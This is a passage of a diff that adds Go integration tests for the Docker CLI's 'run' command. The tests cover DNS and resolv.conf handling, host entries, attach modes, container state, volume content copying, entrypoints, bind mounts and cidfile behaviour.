+	out, _, err := dockerCmdWithError("run", "-v", mount, "busybox", "ls", targetDir)
+	if err == nil {
+		c.Fatal(out, err)
+	}
+}
+
+// Verify that a container gets default DNS when only localhost resolvers exist
+func (s *DockerSuite) TestRunDNSDefaultOptions(c *check.C) {
+	// Not applicable on Windows as this is testing Unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// preserve original resolv.conf for restoring after test
+	origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf")
+	if os.IsNotExist(err) {
+		c.Fatalf("/etc/resolv.conf does not exist")
+	}
+	// defer restored original conf
+	defer func() {
+		if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != nil {
+			c.Fatal(err)
+		}
+	}()
+
+	// test 3 cases: standard IPv4 localhost, commented out localhost, and IPv6 localhost
+	// 2 are removed from the file at container start, and the 3rd (commented out) one is ignored by
+	// GetNameservers(), leading to a replacement of nameservers with the default set
+	tmpResolvConf := []byte("nameserver 127.0.0.1\n#nameserver 127.0.2.1\nnameserver ::1")
+	if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	actual, _ := dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf")
+	// check that the actual defaults are appended to the commented out
+	// localhost resolver (which should be preserved)
+	// NOTE: if we ever change the defaults from google dns, this will break
+	expected := "#nameserver 127.0.2.1\n\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n"
+	if actual != expected {
+		c.Fatalf("expected resolv.conf be: %q, but was: %q", expected, actual)
+	}
+}
+
+func (s *DockerSuite) TestRunDNSOptions(c *check.C) {
+	// Not applicable on Windows as Windows does not support --dns*, or
+	// the Unix-specific functionality of resolv.conf.
+	testRequires(c, DaemonIsLinux)
+	out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf")
+
+	// The client will get a warning on stderr when setting DNS to a localhost address; verify this:
+	if !strings.Contains(stderr, "Localhost DNS setting") {
+		c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr)
+	}
+
+	actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1)
+	if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" {
+		c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual)
+	}
+
+	out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf")
+
+	actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1)
+	if actual != "nameserver 127.0.0.1 options ndots:3" {
+		c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf")
+
+	actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1)
+	if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" {
+		c.Fatalf("expected 'search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3', but says: %q", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) {
+	// Not applicable on Windows as testing Unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf")
+	if os.IsNotExist(err) {
+		c.Fatalf("/etc/resolv.conf does not exist")
+	}
+
+	hostNameservers := resolvconf.GetNameservers(origResolvConf, types.IP)
+	hostSearch := resolvconf.GetSearchDomains(origResolvConf)
+
+	var out string
+	out, _ = dockerCmd(c, "run", "--dns=127.0.0.1", "busybox", "cat", "/etc/resolv.conf")
+
+	if actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "127.0.0.1" {
+		c.Fatalf("expected '127.0.0.1', but says: %q", string(actualNameservers[0]))
+	}
+
+	actualSearch := resolvconf.GetSearchDomains([]byte(out))
+	if len(actualSearch) != len(hostSearch) {
+		c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch))
+	}
+	for i := range actualSearch {
+		if actualSearch[i] != hostSearch[i] {
+			c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i])
+		}
+	}
+
+	out, _ = dockerCmd(c, "run", "--dns-search=mydomain", "busybox", "cat", "/etc/resolv.conf")
+
+	actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP)
+	if len(actualNameservers) != len(hostNameservers) {
+		c.Fatalf("expected %q nameserver(s), but it has: %q", len(hostNameservers), len(actualNameservers))
+	}
+	for i := range actualNameservers {
+		if actualNameservers[i] != hostNameservers[i] {
+			c.Fatalf("expected %q nameserver, but says: %q", actualNameservers[i], hostNameservers[i])
+		}
+	}
+
+	if actualSearch = resolvconf.GetSearchDomains([]byte(out)); string(actualSearch[0]) != "mydomain" {
+		c.Fatalf("expected 'mydomain', but says: %q", string(actualSearch[0]))
+	}
+
+	// test with file
+	tmpResolvConf := []byte("search example.com\nnameserver 12.34.56.78\nnameserver 127.0.0.1")
+	if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+	// put the old resolvconf back
+	defer func() {
+		if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != nil {
+			c.Fatal(err)
+		}
+	}()
+
+	resolvConf, err := ioutil.ReadFile("/etc/resolv.conf")
+	if os.IsNotExist(err) {
+		c.Fatalf("/etc/resolv.conf does not exist")
+	}
+
+	hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP)
+	hostSearch = resolvconf.GetSearchDomains(resolvConf)
+
+	out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf")
+	if actualNameservers = resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "12.34.56.78" || len(actualNameservers) != 1 {
+		c.Fatalf("expected '12.34.56.78', but has: %v", actualNameservers)
+	}
+
+	actualSearch = resolvconf.GetSearchDomains([]byte(out))
+	if len(actualSearch) != len(hostSearch) {
+		c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch))
+	}
+	for i := range actualSearch {
+		if actualSearch[i] != hostSearch[i] {
+			c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i])
+		}
+	}
+}
+
+// Test to see if a non-root user can resolve a DNS name. Also
+// check if the container resolv.conf file has at least 0644 perm.
+func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) {
+	// Not applicable on Windows as Windows does not support --user
+	testRequires(c, SameHostDaemon, Network, DaemonIsLinux, NotArm)
+
+	dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org")
+
+	cID, err := getIDByName("testperm")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	fmode := (os.FileMode)(0644)
+	finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf"))
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if (finfo.Mode() & fmode) != fmode {
+		c.Fatalf("Expected container resolv.conf mode to be at least %s, instead got %s", fmode.String(), finfo.Mode().String())
+	}
+}
+
+// Test if container resolv.conf gets updated the next time it restarts
+// if host /etc/resolv.conf has changed. This only applies if the container
+// uses the host's /etc/resolv.conf and does not have any dns options provided.
+func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
+	// Not applicable on Windows as testing unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	c.Skip("Unstable test, to be re-activated once #19937 is resolved")
+
+	tmpResolvConf := []byte("search pommesfrites.fr\nnameserver 12.34.56.78\n")
+	tmpLocalhostResolvConf := []byte("nameserver 127.0.0.1")
+
+	//take a copy of resolv.conf for restoring after test completes
+	resolvConfSystem, err := ioutil.ReadFile("/etc/resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// This test case is meant to test monitoring resolv.conf when it is
+	// a regular file not a bind mounc. So we unmount resolv.conf and replace
+	// it with a file containing the original settings.
+	mounted, err := mount.Mounted("/etc/resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if mounted {
+		cmd := exec.Command("umount", "/etc/resolv.conf")
+		if _, err = runCommand(cmd); err != nil {
+			c.Fatal(err)
+		}
+	}
+
+	//cleanup
+	defer func() {
+		if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil {
+			c.Fatal(err)
+		}
+	}()
+
+	//1. test that a restarting container gets an updated resolv.conf
+	dockerCmd(c, "run", "--name=first", "busybox", "true")
+	containerID1, err := getIDByName("first")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// replace resolv.conf with our temporary copy
+	bytesResolvConf := []byte(tmpResolvConf)
+	if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// start the container again to pickup changes
+	dockerCmd(c, "start", "first")
+
+	// check for update in container
+	containerResolv, err := readContainerFile(containerID1, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !bytes.Equal(containerResolv, bytesResolvConf) {
+		c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv))
+	}
+
+	/*	//make a change to resolv.conf (in this case replacing our tmp copy with orig copy)
+		if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil {
+						c.Fatal(err)
+								} */
+	//2. test that a restarting container does not receive resolv.conf updates
+	//   if it modified the container copy of the starting point resolv.conf
+	dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf")
+	containerID2, err := getIDByName("second")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	//make a change to resolv.conf (in this case replacing our tmp copy with orig copy)
+	if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// start the container again
+	dockerCmd(c, "start", "second")
+
+	// check for update in container
+	containerResolv, err = readContainerFile(containerID2, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if bytes.Equal(containerResolv, resolvConfSystem) {
+		c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv))
+	}
+
+	//3. test that a running container's resolv.conf is not modified while running
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	runningContainerID := strings.TrimSpace(out)
+
+	// replace resolv.conf
+	if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// check for update in container
+	containerResolv, err = readContainerFile(runningContainerID, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if bytes.Equal(containerResolv, bytesResolvConf) {
+		c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv))
+	}
+
+	//4. test that a running container's resolv.conf is updated upon restart
+	//   (the above container is still running..)
+	dockerCmd(c, "restart", runningContainerID)
+
+	// check for update in container
+	containerResolv, err = readContainerFile(runningContainerID, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !bytes.Equal(containerResolv, bytesResolvConf) {
+		c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv))
+	}
+
+	//5. test that additions of a localhost resolver are cleaned from
+	//   host resolv.conf before updating container's resolv.conf copies
+
+	// replace resolv.conf with a localhost-only nameserver copy
+	bytesResolvConf = []byte(tmpLocalhostResolvConf)
+	if err = ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// start the container again to pickup changes
+	dockerCmd(c, "start", "first")
+
+	// our first exited container ID should have been updated, but with default DNS
+	// after the cleanup of resolv.conf found only a localhost nameserver:
+	containerResolv, err = readContainerFile(containerID1, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n"
+	if !bytes.Equal(containerResolv, []byte(expected)) {
+		c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv))
+	}
+
+	//6. Test that replacing (as opposed to modifying) resolv.conf triggers an update
+	//   of containers' resolv.conf.
+
+	// Restore the original resolv.conf
+	if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// Run the container so it picks up the old settings
+	dockerCmd(c, "run", "--name=third", "busybox", "true")
+	containerID3, err := getIDByName("third")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Create a modified resolv.conf.aside and override resolv.conf with it
+	bytesResolvConf = []byte(tmpResolvConf)
+	if err := ioutil.WriteFile("/etc/resolv.conf.aside", bytesResolvConf, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	err = os.Rename("/etc/resolv.conf.aside", "/etc/resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// start the container again to pickup changes
+	dockerCmd(c, "start", "third")
+
+	// check for update in container
+	containerResolv, err = readContainerFile(containerID3, "resolv.conf")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !bytes.Equal(containerResolv, bytesResolvConf) {
+		c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv))
+	}
+
+	//cleanup, restore original resolv.conf happens in defer func()
+}
+
+func (s *DockerSuite) TestRunAddHost(c *check.C) {
+	// Not applicable on Windows as it does not support --add-host
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--add-host=extra:86.75.30.9", "busybox", "grep", "extra", "/etc/hosts")
+
+	actual := strings.Trim(out, "\r\n")
+	if actual != "86.75.30.9\textra" {
+		c.Fatalf("expected '86.75.30.9\textra', but says: %q", actual)
+	}
+}
+
+// Regression test for #6983
+func (s *DockerSuite) TestRunAttachStdErrOnlyTTYMode(c *check.C) {
+	_, exitCode := dockerCmd(c, "run", "-t", "-a", "stderr", "busybox", "true")
+	if exitCode != 0 {
+		c.Fatalf("Container should have exited with error code 0")
+	}
+}
+
+// Regression test for #6983
+func (s *DockerSuite) TestRunAttachStdOutOnlyTTYMode(c *check.C) {
+	_, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", "busybox", "true")
+	if exitCode != 0 {
+		c.Fatalf("Container should have exited with error code 0")
+	}
+}
+
+// Regression test for #6983
+func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) {
+	_, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", "-a", "stderr", "busybox", "true")
+	if exitCode != 0 {
+		c.Fatalf("Container should have exited with error code 0")
+	}
+}
+
+// Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode
+// but using --attach instead of -a to make sure we read the flag correctly
+func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) {
+	cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true")
+	_, stderr, _, err := runCommandWithStdoutStderr(cmd)
+	if err == nil {
+		c.Fatal("Container should have exited with error code different than 0")
+	} else if !strings.Contains(stderr, "Conflicting options: -a and -d") {
+		c.Fatal("Should have been returned an error with conflicting options -a and -d")
+	}
+}
+
+func (s *DockerSuite) TestRunState(c *check.C) {
+	// TODO Windows: This needs some rework as Windows busybox does not support top
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	state := inspectField(c, id, "State.Running")
+	if state != "true" {
+		c.Fatal("Container state is 'not running'")
+	}
+	pid1 := inspectField(c, id, "State.Pid")
+	if pid1 == "0" {
+		c.Fatal("Container state Pid 0")
+	}
+
+	dockerCmd(c, "stop", id)
+	state = inspectField(c, id, "State.Running")
+	if state != "false" {
+		c.Fatal("Container state is 'running'")
+	}
+	pid2 := inspectField(c, id, "State.Pid")
+	if pid2 == pid1 {
+		c.Fatalf("Container state Pid %s, but expected %s", pid2, pid1)
+	}
+
+	dockerCmd(c, "start", id)
+	state = inspectField(c, id, "State.Running")
+	if state != "true" {
+		c.Fatal("Container state is 'not running'")
+	}
+	pid3 := inspectField(c, id, "State.Pid")
+	if pid3 == pid1 {
+		c.Fatalf("Container state Pid %s, but expected %s", pid2, pid1)
+	}
+}
+
+// Test for #1737
+func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) {
+	// Not applicable on Windows as it does not support uid or gid in this way
+	testRequires(c, DaemonIsLinux)
+	name := "testrunvolumesuidgid"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+		RUN echo 'dockerio:x:1001:' >> /etc/group
+		RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Test that the uid and gid is copied from the image to the volume
+	out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'")
+	out = strings.TrimSpace(out)
+	if out != "dockerio:dockerio" {
+		c.Fatalf("Wrong /hello ownership: %s, expected dockerio:dockerio", out)
+	}
+}
+
+// Test for #1582
+func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) {
+	// TODO Windows, post TP5. Windows does not yet support volume functionality
+	// that copies from the image to the volume.
+	testRequires(c, DaemonIsLinux)
+	name := "testruncopyvolumecontent"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN mkdir -p /hello/local && echo hello > /hello/local/world`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Test that the content is copied from the image to the volume
+	out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello")
+	if !(strings.Contains(out, "/hello/local/world") && strings.Contains(out, "/hello/local")) {
+		c.Fatal("Container failed to transfer content to volume")
+	}
+}
+
+func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) {
+	name := "testrunmdcleanuponentrypoint"
+	if _, err := buildImage(name,
+		`FROM busybox
+		ENTRYPOINT ["echo"]
+		CMD ["testingpoint"]`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+
+	out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name)
+	if exit != 0 {
+		c.Fatalf("expected exit code 0 received %d, out: %q", exit, out)
+	}
+	out = strings.TrimSpace(out)
+	expected := "root"
+	if daemonPlatform == "windows" {
+		if strings.Contains(WindowsBaseImage, "windowsservercore") {
+			expected = `user manager\containeradministrator`
+		} else {
+			expected = `ContainerAdministrator` // nanoserver
+		}
+	}
+	if out != expected {
+		c.Fatalf("Expected output %s, got %q. %s", expected, out, WindowsBaseImage)
+	}
+}
+
+// TestRunWorkdirExistsAndIsFile checks that if 'docker run -w' with existing file can be detected
+func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) {
+	existingFile := "/bin/cat"
+	expected := "not a directory"
+	if daemonPlatform == "windows" {
+		existingFile = `\windows\system32\ntdll.dll`
+		expected = `The directory name is invalid.`
+	}
+
+	out, exitCode, err := dockerCmdWithError("run", "-w", existingFile, "busybox")
+	if !(err != nil && exitCode == 125 && strings.Contains(out, expected)) {
+		c.Fatalf("Existing binary as a directory should error out with exitCode 125; we got: %s, exitCode: %d", out, exitCode)
+	}
+}
+
+func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) {
+	name := "testrunexitonstdinclose"
+
+	meow := "/bin/cat"
+	delay := 60
+	if daemonPlatform == "windows" {
+		meow = "cat"
+	}
+	runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow)
+
+	stdin, err := runCmd.StdinPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	stdout, err := runCmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if err := runCmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+	if _, err := stdin.Write([]byte("hello\n")); err != nil {
+		c.Fatal(err)
+	}
+
+	r := bufio.NewReader(stdout)
+	line, err := r.ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	line = strings.TrimSpace(line)
+	if line != "hello" {
+		c.Fatalf("Output should be 'hello', got '%q'", line)
+	}
+	if err := stdin.Close(); err != nil {
+		c.Fatal(err)
+	}
+	finish := make(chan error)
+	go func() {
+		finish <- runCmd.Wait()
+		close(finish)
+	}()
+	select {
+	case err := <-finish:
+		c.Assert(err, check.IsNil)
+	case <-time.After(time.Duration(delay) * time.Second):
+		c.Fatal("docker run failed to exit on stdin close")
+	}
+	state := inspectField(c, name, "State.Running")
+
+	if state != "false" {
+		c.Fatal("Container must be stopped after stdin closing")
+	}
+}
+
+// Test run -i --restart xxx doesn't hang
+func (s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) {
+	name := "test-inter-restart"
+
+	result := icmd.StartCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-i", "--name", name, "--restart=always", "busybox", "sh"},
+		Stdin:   bytes.NewBufferString("exit 11"),
+	})
+	c.Assert(result.Error, checker.IsNil)
+	defer func() {
+		dockerCmdWithResult("stop", name).Assert(c, icmd.Success)
+	}()
+
+	result = icmd.WaitOnCmd(60*time.Second, result)
+	c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11})
+}
+
+// Test for #2267
+func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) {
+	// Cannot run on Windows as Windows does not support diff.
+	testRequires(c, DaemonIsLinux)
+	name := "writehosts"
+	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts")
+	if !strings.Contains(out, "test2267") {
+		c.Fatal("/etc/hosts should contain 'test2267'")
+	}
+
+	out, _ = dockerCmd(c, "diff", name)
+	if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) {
+		c.Fatal("diff should be empty")
+	}
+}
+
+func eqToBaseDiff(out string, c *check.C) bool {
+	name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32)
+	dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello")
+	cID, err := getIDByName(name)
+	c.Assert(err, check.IsNil)
+
+	baseDiff, _ := dockerCmd(c, "diff", cID)
+	baseArr := strings.Split(baseDiff, "\n")
+	sort.Strings(baseArr)
+	outArr := strings.Split(out, "\n")
+	sort.Strings(outArr)
+	return sliceEq(baseArr, outArr)
+}
+
+func sliceEq(a, b []string) bool {
+	if len(a) != len(b) {
+		return false
+	}
+
+	for i := range a {
+		if a[i] != b[i] {
+			return false
+		}
+	}
+
+	return true
+}
+
+// Test for #2267
+func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) {
+	// Cannot run on Windows as Windows does not support diff.
+	testRequires(c, DaemonIsLinux)
+	name := "writehostname"
+	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname")
+	if !strings.Contains(out, "test2267") {
+		c.Fatal("/etc/hostname should contain 'test2267'")
+	}
+
+	out, _ = dockerCmd(c, "diff", name)
+	if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) {
+		c.Fatal("diff should be empty")
+	}
+}
+
+// Test for #2267
+func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) {
+	// Cannot run on Windows as Windows does not support diff.
+	testRequires(c, DaemonIsLinux)
+	name := "writeresolv"
+	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf")
+	if !strings.Contains(out, "test2267") {
+		c.Fatal("/etc/resolv.conf should contain 'test2267'")
+	}
+
+	out, _ = dockerCmd(c, "diff", name)
+	if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) {
+		c.Fatal("diff should be empty")
+	}
+}
+
+func (s *DockerSuite) TestRunWithBadDevice(c *check.C) {
+	// Cannot run on Windows as Windows does not support --device
+	testRequires(c, DaemonIsLinux)
+	name := "baddevice"
+	out, _, err := dockerCmdWithError("run", "--name", name, "--device", "/etc", "busybox", "true")
+
+	if err == nil {
+		c.Fatal("Run should fail with bad device")
+	}
+	expected := `"/etc": not a device node`
+	if !strings.Contains(out, expected) {
+		c.Fatalf("Output should contain %q, actual out: %q", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunEntrypoint(c *check.C) {
+	name := "entrypoint"
+
+	out, _ := dockerCmd(c, "run", "--name", name, "--entrypoint", "echo", "busybox", "-n", "foobar")
+	expected := "foobar"
+
+	if out != expected {
+		c.Fatalf("Output should be %q, actual out: %q", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunBindMounts(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	if daemonPlatform == "linux" {
+		testRequires(c, DaemonIsLinux, NotUserNamespace)
+	}
+
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+
+	tmpDir, err := ioutil.TempDir("", "docker-test-container")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	defer os.RemoveAll(tmpDir)
+	writeFile(path.Join(tmpDir, "touch-me"), "", c)
+
+	// TODO Windows: Temporary check - remove once TP5 support is dropped
+	if daemonPlatform != "windows" || windowsDaemonKV >= 14350 {
+		// Test reading from a read-only bind mount
+		out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp")
+		if !strings.Contains(out, "touch-me") {
+			c.Fatal("Container failed to read from bind mount")
+		}
+	}
+
+	// test writing to bind mount
+	if daemonPlatform == "windows" {
+		dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla")
+	} else {
+		dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla")
+	}
+
+	readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist
+
+	// test mounting to an illegal destination directory
+	_, _, err = dockerCmdWithError("run", "-v", fmt.Sprintf("%s:.", tmpDir), "busybox", "ls", ".")
+	if err == nil {
+		c.Fatal("Container bind mounted illegal directory")
+	}
+
+	// Windows does not (and likely never will) support mounting a single file
+	if daemonPlatform != "windows" {
+		// test mount a file
+		dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla")
+		content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist
+		expected := "yotta"
+		if content != expected {
+			c.Fatalf("Output should be %q, actual out: %q", expected, content)
+		}
+	}
+}
+
+// Ensure that CIDFile gets deleted if it's empty
+// Perform this test by making `docker run` fail
+func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) {
+	// Skip on Windows. Base image on Windows has a CMD set in the image.
+	testRequires(c, DaemonIsLinux)
+
+	tmpDir, err := ioutil.TempDir("", "TestRunCidFile")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+	tmpCidFile := path.Join(tmpDir, "cid")
+
+	image := "emptyfs"
+	if daemonPlatform == "windows" {
+		// Windows can't support an emptyfs image. Just use the regular Windows image
+		image = WindowsBaseImage
+	}
+	out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image)
+	if err == nil {
+		c.Fatalf("Run without command must fail. out=%s", out)
+	} else if !strings.Contains(out, "No command specified") {
+		c.Fatalf("Run without command failed with wrong output. out=%s\nerr=%v", out, err)
+	}
+
+	if _, err := os.Stat(tmpCidFile); err == nil {
+		c.Fatalf("empty CIDFile %q should've been deleted", tmpCidFile)
+	}
+}
+
+// #2098 - Docker cidFiles only contain short version of the containerId
+//sudo docker run --cidfile /tmp/docker_tesc.cid ubuntu echo "test"
+// TestRunCidFile tests that run --cidfile returns the longid
+func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) {
+	tmpDir, err := ioutil.TempDir("", "TestRunCidFile")
+	if err != nil {
+		c.Fatal(err)
+	}
+	tmpCidFile := path.Join(tmpDir, "cid")
+	defer os.RemoveAll(tmpDir)
+
+	out, _ := dockerCmd(c, "run", "-d", "--cidfile", tmpCidFile, "busybox", "true")
+
+	id := strings.TrimSpace(out)
+	buffer, err := ioutil.ReadFile(tmpCidFile)
+	if err != nil {
+		c.Fatal(err)
+	}
+	cid := string(buffer)
+	if len(cid) != 64 {
+		c.Fatalf("--cidfile should be a long id, not %q", id)
+	}
+	if cid != id {
+		c.Fatalf("cid must be equal to %s, got %s", id, cid)
+	}
+}
+
+func (s *DockerSuite) TestRunSetMacAddress(c *check.C) {
+	mac := "12:34:56:78:9a:bc"
+	var out string
+	if daemonPlatform == "windows" {
+		out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'")
+		mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style MACs
+	} else {
